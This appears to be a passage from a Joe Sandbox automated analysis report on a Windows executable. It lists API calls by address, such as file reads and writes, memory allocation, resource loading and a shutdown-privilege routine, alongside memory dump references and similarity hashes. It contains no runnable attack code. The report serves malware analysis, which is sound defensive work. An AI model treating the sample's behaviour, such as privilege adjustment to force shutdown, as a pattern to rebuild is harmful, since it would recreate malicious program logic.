                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                          • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                                                                                                                                                          • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                                                                                                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01F403AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 442123175-0
                                                                                                                                                                                                                                          • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                                                                                                                                                          • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FormatMessage
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1306739567-0
                                                                                                                                                                                                                                          • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                                                                                                                                                                          • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetEndOfFile.KERNEL32(?,01F57FF4,0040AA59,00000000), ref: 004076B3
                                                                                                                                                                                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01F403AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 734332943-0
                                                                                                                                                                                                                                          • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                                                                                                                                                          • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                                                          • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                                                                                                                                                          • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                                                          • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                                                                                                                                                          • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CharPrev
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 122130370-0
                                                                                                                                                                                                                                          • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                                                                                                                                                          • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                          • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                                                                                                                                                          • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                          • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                                                                                                                                          • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                          • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                                                                                                                                          • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                          • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                                                                                                                                          • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                                                                                                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                                          • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                          • API String ID: 107509674-3733053543
                                                                                                                                                                                                                                          • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                                                                                                                                          • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
                                                                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                                                                          • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                                                                                                                                                                          • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressCloseHandleModuleProc
                                                                                                                                                                                                                                          • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                                                                                                                                                          • API String ID: 4190037839-2401316094
                                                                                                                                                                                                                                          • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                                                                                                                                                                          • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                                                                                                                                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                                                                                                                                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1694776339-0
                                                                                                                                                                                                                                          • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                                                                                                                                                          • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                                                                                                                                                                            • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
